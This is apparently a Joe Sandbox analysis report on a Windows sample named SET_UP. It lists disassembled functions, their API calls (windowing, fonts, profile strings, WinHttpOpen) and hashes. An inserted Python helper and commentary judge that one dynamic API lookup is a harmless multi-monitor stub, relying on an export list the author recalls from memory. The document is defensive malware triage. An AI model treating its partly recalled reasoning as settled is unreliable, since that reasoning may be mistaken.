                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Prop$CallProcRemoveWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2276450057-0
                                                                                                                                                                                                  • Opcode ID: 5f5643829b2bbe78a6361ed387e346e8c61a4b0c33b86b7040a1ff3f3611a4fc
                                                                                                                                                                                                  • Instruction ID: e420809f7bb6e0a59cb5b0557275ba896673fd54bbd538bc7d970202323a7302
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f5643829b2bbe78a6361ed387e346e8c61a4b0c33b86b7040a1ff3f3611a4fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46618976A453146FD220AB56EC48FAF3758EBA7361F000436FA12923C1DB6D990187BE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004B4B97
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 004B4BBA
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004B4BD3
                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004B4BE6
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004B4C33
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004B4C3D
                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004B4C46
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004B4C62
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                                                                                  • String ID: ($@
                                                                                                                                                                                                  • API String ID: 808654186-1311469180
                                                                                                                                                                                                  • Opcode ID: 1885b43dcfa7d0484711776ab88e538bc32a75fc2bd2691fb5dee4302ce6b082
                                                                                                                                                                                                  • Instruction ID: 0e5bd8c50f8d0d7955027a3f6b8668c66136e3f35a0d37c1a192bc7bdb0b0d18
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1885b43dcfa7d0484711776ab88e538bc32a75fc2bd2691fb5dee4302ce6b082
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A517372A04619AFDB11DBA8CC85FEEBBB9AF84714F154126E901F3281D734E9058B68
APIs
• __EH_prolog.LIBCMT ref: 0040936A
  • Part of subcall function 004B051D: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 004B0532
  • Part of subcall function 00402821: LoadBitmapW.USER32(?,?), ref: 00402833
• ImageList_AddMasked.COMCTL32(?,?,00FF00FF,000000A9,?,?,?,?,?,0040917D,?), ref: 004093D0
• ImageList_AddMasked.COMCTL32(?,?,00FF00FF,000000C0,?,?,?,?,?,0040917D,?), ref: 00409416
• ImageList_AddMasked.COMCTL32(?,?,00FF00FF,00000082,?,?,?,?,?,0040917D,?), ref: 0040945C
• ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000DE,?,?,?,?,?,0040917D,?), ref: 004094A7
• ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000CC,?,?,?,?,?,0040917D,?), ref: 004094ED
• ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000BF,?,?,?,?,?,0040917D,?), ref: 00409533
• ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,0000009B,?,?,?,?,?,0040917D,?), ref: 00409579
• ImageList_AddMasked.COMCTL32(?,?,00FF00FF,000000A4,?,?,?,?,?,0040917D,?), ref: 004095C3
• ImageList_AddMasked.COMCTL32(?,?,00FF00FF,00000097,?,?,?,?,?,0040917D,?), ref: 0040961E
• ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000A8,?,?,?,?,?,0040917D,?), ref: 00409670
• ImageList_AddMasked.COMCTL32(?,?,00FFFFFF,000000DF,?,?,?,?,?,0040917D,?), ref: 004096C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: ImageList_$Masked$BitmapCreateH_prologLoad
• String ID: <L$VGL
• API String ID: 198358146-514139165
• Opcode ID: b19502c1f23d2aba3ba9163309251bf3035561fdb678f7f6cf6f208774932536
• Instruction ID: ec2b9814fbc9ecde94d479c8f6e46199daff313f5f7dab3fb59c7477b83db8de
• Opcode Fuzzy Hash: b19502c1f23d2aba3ba9163309251bf3035561fdb678f7f6cf6f208774932536
• Instruction Fuzzy Hash: 42A1567169030A6AE720EBB1CD57FFF73B8AF14709F500529B612B60D1DBB86E04CA25
APIs
• GetModuleHandleW.KERNEL32(USER32,00000000,?,75C04A40,00495BFD,?,?,?,?,?,?,?,004B4C54,00000000,00000002,00000028), ref: 00495AE6
• GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00495AFE
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00495B0F
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495B20
• GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00495B31
• GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00495B42
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00495B53
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: EnumDisplayMonitors$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
• API String ID: 667068680-2547861404
• Opcode ID: 540b09dfbc93f48e510518afd08754dc04e3d96cb64f543550252be3d951004e
• Instruction ID: 4201b0d532340dd68414abd755048fe9f95cfbc804aa8f7992f09b89358cf7ae
• Opcode Fuzzy Hash: 540b09dfbc93f48e510518afd08754dc04e3d96cb64f543550252be3d951004e
• Instruction Fuzzy Hash: B11181B5D517129AC7128F25ACC092EBEE0B32C766374443FE004D2291DB7C5449EB5E
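The block above is the kind of evidence behind the report's "Contains functionality to dynamically determine API calls" signature, and it is worth checking what is actually being resolved before treating it as evasion. The script below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses the report's "APIs" line format (`• Name.MODULE(args), ref: addr`, with the optional "Part of subcall function" prefix), groups every GetProcAddress target under the module fetched by the preceding GetModuleHandleW, and compares the result against the export names that the Windows SDK's multimon.h compatibility stub resolves at startup. The sample input is the seven lines of this function copied from the report; the stub export list is reproduced from the header as I recall it and should be treated as an assumption.

```python
import re
from collections import OrderedDict

# Constructed input: the "APIs" lines of the function above, copied from the report.
SAMPLE_APIS = """\
• GetModuleHandleW.KERNEL32(USER32,00000000,?,75C04A40,00495BFD,?,?,?,?,?,?,?,004B4C54,00000000,00000002,00000028), ref: 00495AE6
• GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00495AFE
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00495B0F
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495B20
• GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00495B31
• GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00495B42
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00495B53
"""

# Names resolved by InitMultipleMonitorStubs() in the SDK's multimon.h
# (assumption: list reproduced from memory of the header).
MULTIMON_STUB_EXPORTS = frozenset({
    "GetSystemMetrics", "MonitorFromWindow", "MonitorFromRect",
    "MonitorFromPoint", "EnumDisplayMonitors", "GetMonitorInfoA",
    "GetMonitorInfoW",
})

# One report line: optional subcall prefix, Api.MODULE(args), ref: address.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_calls(text):
    """Return one dict per parsable API line, in report order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "APIs" or "Strings" are skipped
        calls.append({
            "api": m["api"],
            "module": m["module"],
            "args": [a.strip() for a in m["args"].split(",")],
            "ref": m["ref"],
        })
    return calls


def resolved_exports(calls):
    """Map each GetModuleHandle* target to the names later passed to GetProcAddress.

    The report shows only the first argument of GetModuleHandleW reliably, so
    the module is tracked by call order rather than by handle value.
    """
    groups = OrderedDict()
    current = "<unknown module>"
    for call in calls:
        if call["api"].startswith("GetModuleHandle") and call["args"]:
            current = call["args"][0]
            groups.setdefault(current, [])
        elif call["api"] == "GetProcAddress" and len(call["args"]) >= 2:
            groups.setdefault(current, []).append(call["args"][1])
    return groups


def is_multimon_stub(groups):
    """True when the only dynamic resolution is USER32 multi-monitor exports."""
    if list(groups) != ["USER32"]:
        return False
    names = set(groups["USER32"])
    return bool(names) and names <= MULTIMON_STUB_EXPORTS


if __name__ == "__main__":
    parsed = parse_api_calls(SAMPLE_APIS)
    groups = resolved_exports(parsed)
    for module, names in groups.items():
        print(f"{module}: {', '.join(names)}")
    print("multimon.h compatibility stub:", is_multimon_stub(groups))
```

On this function the resolved set is exactly the multi-monitor API group, so the dynamic lookup here is a legacy compatibility shim carried in by the runtime rather than an attempt to hide imports; the signature still fires, but the evidence for evasion has to come from other functions in the report.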
APIs
• EnterCriticalSection.KERNEL32(0050CEA0,75C04920,74DEB510,?,?,?,?,?,?,?,?,?,?,?,?,004ABD87), ref: 004AC787
• GetProfileStringA.KERNEL32(windows,kanjimenu,roman,?,00000009), ref: 004AC7B0
• lstrcmpiA.KERNEL32(?,kanji), ref: 004AC7C2
• GetProfileStringA.KERNEL32(windows,hangeulmenu,english,?,00000009), ref: 004AC7E5
• lstrcmpiA.KERNEL32(?,hangeul), ref: 004AC7F1
• LeaveCriticalSection.KERNEL32(0050CEA0,?,?,?,?,?,?,?,?,?,?,?,?,004ABD87), ref: 004AC803
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
• String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
• API String ID: 1105401458-111014456
• Opcode ID: 88af9852d97e4a00fbbf2b1755086f985ebb437eda2a136736e22f51507b52c9
• Instruction ID: 053c822bdb67e943871b36e24ff51ca3f0690f3602dde31ac2d7b0a2ab354bbb
• Opcode Fuzzy Hash: 88af9852d97e4a00fbbf2b1755086f985ebb437eda2a136736e22f51507b52c9
• Instruction Fuzzy Hash: AF01F77664434A7AD350A354EC45FAF3FACB7A5B08F040565F580A22E1EBB464089B66
APIs
• __EH_prolog.LIBCMT ref: 0041D7BE
  • Part of subcall function 004B1F9A: lstrlenW.KERNEL32(00000000,00000000,?,?,004C4ED0,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004B1FC4
• WinHttpOpen.WINHTTP(?,?,?,00000000,00000000), ref: 0041D876
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prologHttpOpenlstrlen
                                                                                                                                                                                                  • String ID: 3
                                                                                                                                                                                                  • API String ID: 1889296618-1842515611
                                                                                                                                                                                                  • Opcode ID: a0e750954a8bc57066090b094fb842a1ad9bd76fd7e3bbf3ea8c084b19d4ac18
                                                                                                                                                                                                  • Instruction ID: 54514846c4f22e90c0294d729db4f2656616c93d8868f050e0d49f2e970b1be0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0e750954a8bc57066090b094fb842a1ad9bd76fd7e3bbf3ea8c084b19d4ac18
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61B159B1D04209EFCF15DF94C894AEEBBB5BF18354F20416EE512A32A1D7389E44CB65
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C4202
                                                                                                                                                                                                    • Part of subcall function 004C68EF: EnterCriticalSection.KERNEL32(0050B348,?,00000000,?,?,004C665E,00000010,?,00000000,?,?,?,004C4BA2,Vht ,004111C1,004C4BA8), ref: 004C692A
                                                                                                                                                                                                    • Part of subcall function 004C68EF: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,004C665E,00000010,?,00000000,?,?,?,004C4BA2,Vht ,004111C1,004C4BA8), ref: 004C693C
                                                                                                                                                                                                    • Part of subcall function 004C68EF: LeaveCriticalSection.KERNEL32(0050B348,?,00000000,?,?,004C665E,00000010,?,00000000,?,?,?,004C4BA2,Vht ,004111C1,004C4BA8), ref: 004C6945
                                                                                                                                                                                                    • Part of subcall function 004C68EF: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,004C665E,00000010,?,00000000,?,?,?,004C4BA2,Vht ,004111C1,004C4BA8,004B5FEA), ref: 004C6957
                                                                                                                                                                                                  • LoadBitmapW.USER32(?,00007912), ref: 004C4239
                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 004C424B
                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000002A), ref: 004C42A5
                                                                                                                                                                                                  • lstrcpyW.KERNEL32(?,Small Fonts,?,0000000A), ref: 004C42BF
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 004C42E5
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004C4315
                                                                                                                                                                                                  • GetTextMetricsW.GDI32(?,?), ref: 004C4327
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004C4338
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
                                                                                                                                                                                                  • String ID: $Small Fonts$Terminal
                                                                                                                                                                                                  • API String ID: 1234877182-3042510724
                                                                                                                                                                                                  • Opcode ID: d1afbe2c1e5c2f82b537feb478a92327b06128361ce9a249851067cbc34ea8ce
                                                                                                                                                                                                  • Instruction ID: a1ade8ff440ca242514af1400af706deda9d7c3c076b303ecc19a7bcd3717eda
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1afbe2c1e5c2f82b537feb478a92327b06128361ce9a249851067cbc34ea8ce
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0941C475A002099FEB60DFA5DD95F9E7BB8FB44304F0444AEF514E22A1EB785A48CF24
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCapture.USER32 ref: 00415D58
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00415D75
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00415D83
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415DE4
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415DF5
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E02
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E1D
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E63
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E74
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E83
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E9A
                                                                                                                                                                                                  • PtInRect.USER32(?,?,?), ref: 00415EDA
                                                                                                                                                                                                  • SetCursor.USER32(?), ref: 00415EE7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MetricsSystem$Rect$CaptureClientCopyCursor
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 282267412-0
                                                                                                                                                                                                  • Opcode ID: a3ebdbf3bf7db2c6e860947962f09a6db4cf2dfd3c1b24c154764403165513a7
                                                                                                                                                                                                  • Instruction ID: 2b0d34dc273c18520a77f17b944b00958b2f653f2b10ed1d82eeb29f532a9e67
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3ebdbf3bf7db2c6e860947962f09a6db4cf2dfd3c1b24c154764403165513a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10512931A007199FCF18DFA9C999AEEBBF5AF88304F14452EE506E3350D774A580CB14
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00428FAE
                                                                                                                                                                                                  • __ftol.LIBCMT ref: 00429008
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00429040
                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00429075
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004290C5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$H_prolog__allrem__ftol
                                                                                                                                                                                                  • String ID: %.3f$%d:%02d$%d:%02d.%03d$%d:%02d:%02d$%d:%02d:%02d.%03d$d
                                                                                                                                                                                                  • API String ID: 3512649120-421013915
                                                                                                                                                                                                  • Opcode ID: 49a7c50b7b1c30ed6408f0b52d999b4129a79a7579129b918c03dc9655f88de5
                                                                                                                                                                                                  • Instruction ID: 0c6a34c948fb92af345da394e9623df9e4bab39ff0284ffd81ee5fa0d0ec51f6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49a7c50b7b1c30ed6408f0b52d999b4129a79a7579129b918c03dc9655f88de5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C41D6B1B0022EAFEF14AE56DC46DBF776AEB48304F54443FB91092241D6B99D10C7A9
                                                                                                                                                                                                  APIs
  • Part of subcall function 004C657B: TlsGetValue.KERNEL32(0050B044,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000,?,004AEEBC,00000000,00000000,00000000,00000000), ref: 004C65BA
• RegisterWindowMessageW.USER32(commdlg_LBSelChangedNotify,Function_000111C1), ref: 004108B7
• RegisterWindowMessageW.USER32(commdlg_ShareViolation), ref: 004108C3
• RegisterWindowMessageW.USER32(commdlg_FileNameOK), ref: 004108CF
• RegisterWindowMessageW.USER32(commdlg_help), ref: 004108DB
• RegisterWindowMessageW.USER32(commdlg_SetRGBColor), ref: 004108E7
  • Part of subcall function 004B54E9: SetWindowLongW.USER32(?,000000FC,00000000), ref: 004B5518
• SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 004109C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: MessageWindow$Register$LongSendValue
• String ID: commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
• API String ID: 2377901579-3814289011
• Opcode ID: 75a7b3f6ef78bd165029fab9382ccebb8b4594cebf7c0827d53680529ce0173f
• Instruction ID: 5c2a92680b80dca41fe09fd4cb97c78a7277560dc1a37b47210954bdcc7f302e
• Opcode Fuzzy Hash: 75a7b3f6ef78bd165029fab9382ccebb8b4594cebf7c0827d53680529ce0173f
• Instruction Fuzzy Hash: FD41C770600305EBEF319F52DC99FEE3BA0EB54350F10442BF845562A2D7B998C4DBA9
APIs
• lstrcmpA.KERNEL32(?,004DC640,00000002,?,?,00000000,004C56AD,?,?,00000002,00000000,00000000), ref: 004C570E
